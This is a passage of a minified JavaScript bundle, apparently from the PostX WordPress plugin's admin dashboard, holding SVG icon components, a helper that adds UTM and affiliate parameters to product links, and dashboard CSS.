8.23055 14.5257 9.44963 13.5418C10.1752 12.9563 10.7559 12.358 11.1751 11.762C11.671 11.0573 11.9446 10.3526 11.991 9.66303C12.1822 9.52065 12.3733 9.36626 12.5629 9.19908C13.5756 8.30557 14.3787 7.19528 14.9515 5.89861C15.6458 4.32597 15.9978 2.47575 15.9978 0.39996V0H15.5978L15.5986 0.00079992ZM2.48552 7.84641C3.24785 6.74013 4.41333 5.36826 5.7268 4.93711C5.20765 5.84661 4.93888 6.68173 4.84209 7.21128C4.02236 7.26546 3.22145 7.48132 2.48552 7.84641ZM8.15376 13.5114C8.51883 12.7761 8.73444 11.9757 8.78809 11.1565C9.31684 11.0597 10.1528 10.7909 11.0615 10.2726C10.6295 11.5836 9.25845 12.7491 8.15296 13.5114H8.15376ZM12.0342 8.59994C10.3703 10.0678 8.64731 10.3998 8.39933 10.3998C8.39773 10.3998 8.23375 10.3966 7.79219 10.0854C7.48422 9.86861 7.12506 9.55984 6.78269 9.21748C6.44033 8.87511 6.13156 8.51595 5.91478 8.20798C5.60361 7.76642 5.60041 7.60244 5.60041 7.60084C5.60041 7.35286 5.93238 5.62984 7.40023 3.966C9.15686 1.9758 11.8454 0.887111 15.1947 0.806319C15.1139 4.15558 14.026 6.84411 12.035 8.60074L12.0342 8.59994Z",fill:"white"})),r.subtract=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightMark=(0,a.createElement)("svg",{width:"14",height:"11",viewBox:"0 0 14 11",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M1 5L5 9L13 1",stroke:"#5ECA70",strokeWidth:"1.5"})),r.plus=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),r.delete=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M18.2 6.5H16c-.4 0-.8-.3-1-.7l-.3-1c-.1-.4-.5-.7-1-.7h-3.5c-.4 0-.8.3-1 .7l-.2 1c-.1.4-.5.7-1 .7H5.8c-.5 0-.8.3-.8.7s.3.8.8.8h12.5c.4 0 .7-.3.7-.8s-.3-.7-.8-.7zM12.5 16.5c0 .3-.2.5-.5.5s-.5-.2-.5-.5V9H6l1.3 9.3c.1 1 1 1.7 2 1.7h5.5c1 0 1.8-.7 2-1.7L18 9h-5.5v7.5z"})),r.edit=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M19.3 18.1h-5.9c-.4 0-.8.3-.8.8s.3.8.8.8h5.9c.4 0 .8-.3.8-.8s-.4-.8-.8-.8zM16.2 11c1.5-1.9 1.5-2 1.6-2 .4-.6.5-1.2.3-1.9-.1-.7-.6-1.2-1.1-1.5 0 0-1.3-1-1.4-1.1-1.1-.9-2.7-.7-3.6.4l-7.7 9.6c-.3.4-.5 1.1-.3 1.7l.7 2.8c.1.3.4.6.7.6h3c.6 0 1.2-.3 1.6-.8 3.2-4.1 5.1-6.4 6.2-7.8zm-1.5-5.3s1.4 1.1 1.5 1.2c.2.1.4.4.5.6.1.3 0 .5-.1.7 0 .1-.4.6-1.1 1.3L12.3 7l.9-1.2c.4-.4 1-.5 1.5-.1zM8.8 17.8c-.1.1-.3.2-.5.2H5.9l-.5-2.2c0-.2 0-.4.1-.5l5.8-7.2 3.2 2.5c-1.7 2.2-4.1 5.3-5.7 7.2z"})),r.duplicate=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M11 9.75c-.69 0-1.25.56-1.25 1.25v9c0 .69.56 1.25 1.25 1.25h9c.69 0 1.25-.56 1.25-1.25v-9c0-.69-.56-1.25-1.25-1.25h-9ZM8.25 11A2.75 2.75 0 0 1 11 8.25h9A2.75 2.75 0 0 1 22.75 11v9A2.75 2.75 0 0 1 20 22.75h-9A2.75 2.75 0 0 1 8.25 20v-9Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M4 2.75A1.25 1.25 0 0 0 2.75 4v9A1.25 1.25 0 0 0 4 14.25h1a.75.75 0 0 1 0 1.5H4A2.75 2.75 0 0 1 1.25 13V4A2.75 2.75 0 0 1 4 1.25h9A2.75 2.75 0 0 1 15.75 4v1a.75.75 0 0 1-1.5 0V4A1.25 1.25 0 0 0 13 2.75H4Z",clipRule:"evenodd"})),r.tabLongArrowRight=(0,a.createElement)("svg",{width:"33",height:"8",viewBox:"0 0 33 8",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M32.8536 4.35355C33.0488 4.15829 33.0488 3.84171 32.8536 3.64645L29.6716 0.464466C29.4763 0.269204 29.1597 0.269204 28.9645 0.464466C28.7692 0.659728 28.7692 0.976311 28.9645 1.17157L31.7929 4L28.9645 6.82843C28.7692 7.02369 28.7692 7.34027 28.9645 7.53553C29.1597 7.7308 29.4763 7.7308 29.6716 7.53553L32.8536 4.35355ZM0.5 4V4.5H32.5V4V3.5H0.5V4Z",fill:"currentColor"})),r.saveLine=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.66667L6.33333 12L13 4",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightAngle=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M17.9333 12.8C18.4667 12.4 18.4667 11.6 17.9333 11.2L8.6 4.2C7.94076 3.70557 7 4.17595 7 5V19C7 19.824 7.94076 20.2944 8.6 19.8L17.9333 12.8Z",fill:"currentColor"})),r.arrowRight=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 12H20M14 5L21 12L14 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.arrowLeft=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21 12H4M10 5L3 12L10 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.fiveStar=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M9.18029 2.60415C9.5027 1.90962 10.4975 1.90962 10.8199 2.60415L12.6 6.43897C12.7314 6.72197 13.0016 6.91689 13.3134 6.95362L17.5362 7.45111C18.3006 7.54117 18.6078 8.47852 18.043 8.99753L14.9193 11.8678C14.6892 12.0792 14.5862 12.394 14.6473 12.6992L15.4762 16.8444C15.6261 17.5942 14.8215 18.1737 14.1496 17.7999L10.4414 15.7375C10.1673 15.585 9.83291 15.585 9.55876 15.7375L5.8506 17.7999C5.17864 18.1737 4.37404 17.5942 4.52397 16.8444L5.35289 12.6992C5.41393 12.394 5.31093 12.0792 5.08084 11.8678L1.95716 8.99753C1.39232 8.47852 1.69954 7.54117 2.464 7.45111L6.68675 6.95362C6.99858 6.91689 7.26875 6.72197 7.40012 6.43897L9.18029 2.60415Z",stroke:"currentColor",strokeWidth:"1.31579",strokeLinejoin:"round"})),r.knowledgeBase=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V7.35702C17.5 6.915 17.3244 6.49107 17.0118 6.17851L13.8215 2.98816C13.5089 2.67559 13.085 2.5 12.643 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V15.8333C2.5 16.7538 3.24619 17.5 4.16667 17.5Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 7.5L9.99984 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 10L13.3332 10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 12.5L11.6665 12.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.commentCount2=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M16.6667 3.33325H3.33341C2.41294 3.33325 1.66675 4.07944 1.66675 4.99992V12.4999C1.66675 13.4204 2.41294 14.1666 3.33341 14.1666H7.08341V17.4999L11.2501 14.1666H16.6667C17.5872 14.1666 18.3334 13.4204 18.3334 12.4999V4.99992C18.3334 4.07944 17.5872 3.33325 16.6667 3.33325Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.66675 9.16659L6.66675 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10 9.16659L10 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13.3333 9.16659L13.3333 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.customerSupport=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.1665 7.5C4.1665 4.73857 6.77818 2.5 9.99984 2.5C13.2215 2.5 15.8332 4.73857 15.8332 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.8333 14.1667V15.8334C15.8333 16.7539 15.0872 17.5001 14.1667 17.5001H10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M3.42064 7.99896L2.038 8.91951C1.80593 9.07401 1.6665 9.33434 1.6665 9.61317V12.0538C1.6665 12.3327 1.80593 12.593 2.038 12.7475L3.42064 13.6681C3.88395 13.9765 4.47696 14.0133 4.97485 13.7645C5.50087 13.5016 5.83317 12.964 5.83317 12.376V9.29101C5.83317 8.70301 5.50087 8.16542 4.97485 7.90253C4.47696 7.65369 3.88395 7.69048 3.42064 7.99896Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.0248 7.90253C15.5227 7.65369 16.1158 7.69048 16.579 7.99896L17.9617 8.91951C18.1938 9.07401 18.3332 9.33434 18.3332 9.61317V12.0538C18.3332 12.3327 18.1938 12.593 17.9617 12.7475L16.579 13.6681C16.1158 13.9765 15.5227 14.0133 15.0248 13.7645C14.4988 13.5016 14.1665 12.964 14.1665 12.376V9.29101C14.1665 8.70301 14.4988 8.16542 15.0248 7.90253Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.facebook=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 1.875C2.90101 1.875 1.875 2.90101 1.875 4.16667V15.8333C1.875 17.099 2.90101 18.125 4.16667 18.125H9.51011V12.2281H7.91667V9.86675H9.51011V8.84924C9.51011 6.2191 10.7004 5 13.2825 5C13.7721 5 14.6168 5.09601 14.9624 5.19201V7.33258C14.78 7.31338 14.4632 7.3038 14.0696 7.3038C12.8026 7.3038 12.313 7.78373 12.313 9.03161V9.86675H14.8371L14.4034 12.2281H12.313V18.125H15.8333C17.099 18.125 18.125 17.099 18.125 15.8333V4.16667C18.125 2.90101 17.099 1.875 15.8333 1.875H4.16667Z",fill:"currentColor"})),r.typography=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"15",height:"15",rx:"1.66667",stroke:"currentColor",strokeWidth:"1.25"}),(0,a.createElement)("path",{d:"M5.83203 7.91671V6.66671C5.83203 6.20647 6.20513 5.83337 6.66536 5.83337H13.332C13.7923 5.83337 14.1654 6.20647 14.1654 6.66671V7.91671M9.9987 5.83337V14.1667M7.91536 14.1667H12.082",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.reload=(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3.43552 16C4.90822 18.9634 7.96628 21 11.5 21C16.4706 21 20.5 16.9706 20.5 12C20.5 7.02944 16.4706 3 11.5 3C7.96628 3 4.90822 5.03656 3.43552 8M8.5 8.5H3V3",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.border=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.33398 2.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M2.5 11.6666L2.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M8.33398 17.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M17.5 11.6666L17.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 17.5H4.16667C3.24619 17.5 2.5 16.7538 2.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 2.5H15.8333C16.7538 2.5 17.5 3.24619 17.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.boxShadow=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"12.5",height:"12.5",rx:"0.833333",stroke:"currentColor",strokeWidth:"1.25",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15 5H16.6667C17.1269 5 17.5 5.3731 17.5 5.83333V6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5 15V16.6667C5 17.1269 5.3731 17.5 5.83333 17.5H6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5007 15.8333V16.6666C17.5007 17.1268 17.1276 17.4999 16.6673 17.4999H15.834",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8.75 17.5H10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.291 17.5H13.7493",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 8.75V10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 12.2916V13.75",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}));const o=r},2044:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});const a={example:{source:"db-postx-featurename",medium:"block-feature",campaign:"postx-dashboard"},db_hellobar:{source:"db-postx-hellobar",medium:"summer-sale",campaign:"postx-dashboard"},explore_pro_feature:{source:"db-postx-wizard",medium:"explore-features",campaign:"postx-dashboard"},ticket_support:{source:"db-postx-wizard",medium:"ticket-support",campaign:"postx-dashboard"},postx_doc:{source:"db-postx-wizard",medium:"postx-doc",campaign:"postx-dashboard"},addons_popup:{source:"db-postx-addons",medium:"popup",campaign:"postx-dashboard"},builder_popup:{source:"db-postx-builder",medium:"popup-upgrade-pro",campaign:"postx-dashboard"},block_docs:{source:"db-postx-editor",medium:"block-docs",campaign:"postx-dashboard"},blockProFeat:{source:"db-postx-editor",medium:"pro-features",campaign:"postx-dashboard"},blockUpgrade:{source:"db-postx-editor",medium:"block-pro",campaign:"postx-dashboard"},blockPatternPro:{source:"db-postx-editor",medium:"blocks-premade",campaign:"postx-dashboard"},blockProLay:{source:"db-postx-editor",medium:"pro-layout",campaign:"postx-dashboard"},wizardPatternPro:{source:"db-postx-wizard",medium:"core_features-patterns",campaign:"postx-dashboard"},wizardStaterPackPro:{source:"db-postx-wizard",medium:"core_features-SP",campaign:"postx-dashboard"},slider_2:{source:"db-postx-editor",medium:"slider2-pro",campaign:"postx-dashboard"},advanced_search:{source:"db-postx-editor",medium:"adv_search-pro",campaign:"postx-dashboard"},customFont:{source:"db-postx-editor",medium:"custom-font",campaign:"postx-dashboard"},dc:{source:"db-postx-editor",medium:"acf-pro",campaign:"postx-dashboard"},postx_dashboard_settings:{source:"db-postx-setting",medium:"upgrade-pro-sidebar",campaign:"postx-dashboard"},postx_dashboard_tutorials:{source:"db-postx-tutorial",medium:"tutorials-upgrade_to_pro",campaign:"postx-dashboard"},postx_dashboard_tutorialsdocs:{source:"db-postx-tutorial",medium:"tutorials-doc",campaign:"postx-dashboard"},menu_save_temp_pro:{source:"db-postx-save-template",medium:"popup-upgrade",campaign:"postx-dashboard"},settingsFR:{source:"db-postx-setting",medium:"settings-upgrade-pro",campaign:"postx-dashboard"},tutorialsFR:{source:"db-postx-tutorial",medium:"tutorials-FR",campaign:"postx-dashboard"},editor_darklight:{source:"db-postx-editor",medium:"darklight-pro",campaign:"postx-dashboard"},final_hour_sale:{source:"db-postx-hellobar",medium:"final-hour-sale",campaign:"postx-dashboard"},massive_sale:{source:"db-postx-hellobar",medium:"massive-sale",campaign:"postx-dashboard"},flash_sale:{source:"db-postx-hellobar",medium:"flash-sale",campaign:"postx-dashboard"},exclusive_deals:{source:"db-postx-hellobar",medium:"exclusive-deals",campaign:"postx-dashboard"},black_friday_sale:{source:"db-postx-hellobar",medium:"black-friday",campaign:"postx-dashboard"},new_year_sale:{source:"db-postx-hellobar",medium:"new-year-sale",campaign:"postx-dashboard"}},r=e=>{const{url:t,utmKey:n,affiliate:r,hash:o}=e,i=new URL(t||"https://www.wpxpo.com/postx/"),l=a[n];return l&&(i.searchParams.set("utm_source",l.source),i.searchParams.set("utm_medium",l.medium),i.searchParams.set("utm_campaign",l.campaign)),r&&i.searchParams.set("ref",r),o&&(i.hash=o.startsWith("#")?o:`#${o}`),i.toString()}},6511:(e,t,n)=>{"use strict";n.d(t,{Z:()=>u});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o),l=n(1667),s=n.n(l),p=new URL(n(4975),n.b),c=i()(r()),d=s()(p);c.push([e.id,`.ultp-gettingstart-message{display:grid;grid-template-columns:440px auto;gap:30px;align-items:center;justify-content:space-between}@media only screen and (max-width: 1200px){.ultp-gettingstart-message{grid-template-columns:1fr 1fr}}.ultp-gettingstart-message .ultp-start-left{position:relative;line-height:0;height:100%}.ultp-gettingstart-message .ultp-start-left img{width:100%;height:100%;border-radius:4px}@media only screen and (max-width: 1400px){.ultp-gettingstart-message .ultp-start-left img{object-fit:cover}}.ultp-gettingstart-message .ultp-start-left .ultp-start-content{position:absolute;flex-direction:column;gap:20px;display:flex;bottom:24px;left:24px;line-height:normal}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-text{color:#fff;font-size:18px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns{display:flex;align-items:center;flex-wrap:wrap;gap:12px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-primary-button,.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{padding:10px 20px;font-size:14px;border-radius:4px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{background:unset;border:1px solid #fff;color:#fff !important;font-weight:600}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button:hover{background:unset}.ultp-gettingstart-message .ultp-start-right{display:grid;grid-template-columns:1fr 1fr;height:100%}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-start-right{grid-template-columns:1fr}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{background:#fff;padding:24px 32px;border-radius:0 4px 4px 0;display:flex;flex-direction:column;justify-content:center}@media only screen and (min-width: 1200px)and (max-width: 1360px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{padding:24px 15px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title{color:#091f36;font-size:16px;font-weight:600;margin-bottom:8px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title._pro{font-size:20px;margin-bottom:12px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description._pro{color:#070707;margin-bottom:32px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{display:none}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists{display:flex;flex-direction:column;gap:5px;margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{display:flex;align-items:center;gap:7px;color:#070707;font-weight:500;font-size:14px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{font-size:12px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn{background:linear-gradient(180deg, #ea5e40, transparent) #e36f16;padding:12px 25px;border-radius:4px;font-size:14px;margin-bottom:15px;display:flex;align-items:center;gap:10px;width:fit-content;cursor:pointer;text-decoration:none;color:#fff}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn:hover{background:linear-gradient(180deg, #e36f16, transparent) #ea5e40}.ultp-gettingstart-message .ultp-dashborad-banner{width:100%;position:relative;line-height:0}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-dashborad-banner{display:none}}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container{max-width:25%;position:absolute;left:0;right:0;top:0;bottom:0;margin:auto;max-height:fit-content;cursor:pointer;height:fit-content}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-play-icon{max-width:100%}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-animate{-webkit-animation:pulse 1.2s ease infinite;animation:pulse 1.2s ease infinite;background:var(--postx-primary-color);position:absolute;width:100%;height:100%;left:0;right:0;top:0;bottom:0;margin:auto;border-radius:100%}.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{max-width:100%;height:100%;border-radius:4px 0 0 4px}@media only screen and (max-width: 1420px){.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{object-fit:cover}}@-webkit-keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}@keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}.ultp-dashboard-addons-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading.mt{margin-top:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading{margin-bottom:32px;color:#070707;font-size:24px;font-weight:600}.ultp-dashboard-addons-container .ultp-addon-parent-heading>span{color:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addons-grid{display:grid;justify-content:space-between;grid-template-columns:1fr 1fr;gap:30px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item{display:flex;flex-direction:column;justify-content:space-between;padding:unset !important;position:relative;overflow:hidden;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item img{height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .dashicons{height:unset;width:unset;line-height:unset;font-size:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-new-tag{font-weight:500;font-size:10px;color:#070707;padding:4px 8px;background:#ffbd42;border-radius:24px;padding:4px 8px;height:fit-content;line-height:10px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-shortcode-copy{cursor:copy}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents{padding:24px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name{display:flex;gap:12px;align-items:center;margin-bottom:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .name{font-size:20px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .ultp-addon-item-title{font-weight:500;display:flex;align-items:center;gap:8px;line-height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock{position:absolute;top:0;left:0}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock span{position:absolute;top:4px;left:2px;font-weight:600;font-size:12px;transform:rotate(315deg);color:#fff}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock::after{content:"";width:42px;height:42px;background-image:url(${d});display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-addons-container .ultp-addons-container-grid.ultp-gs{display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid .ultp-addons-items{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-addons-container .ultp-addon-item-actions{display:flex;align-items:center;justify-content:space-between;padding:16px 24px;border-top:1px solid #eaedf2}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action{display:flex;justify-content:space-between;align-items:center;gap:6px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:6px;border:1px solid #e6e6e6;padding:2px 6px;color:#6e6e6e;font-size:14px;font-weight:500;border-radius:4px;transition:400ms}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip svg{width:14px;height:14px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip:hover{color:#070707;font-weight:500;border:1px solid #070707}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons,.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action a{font-size:14px;color:#575a5d;cursor:pointer}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons-admin-collapse{transform:rotate(180deg)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting{position:relative;height:20px !important;width:20px !important;margin-left:10px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg{color:#6e6e6e;cursor:pointer;opacity:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg:hover{color:#070707}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting::before{position:absolute;left:-12px;font-size:30px;top:-13px;border-left:1px solid #eaedf2;padding-left:9px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings{width:150%;height:100vh;background-color:rgba(0,0,0,.5);position:fixed;top:0%;right:10%;transition:.5s;z-index:999}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup{height:100%;width:600px;position:fixed;z-index:99;top:32px;right:0px;margin:0 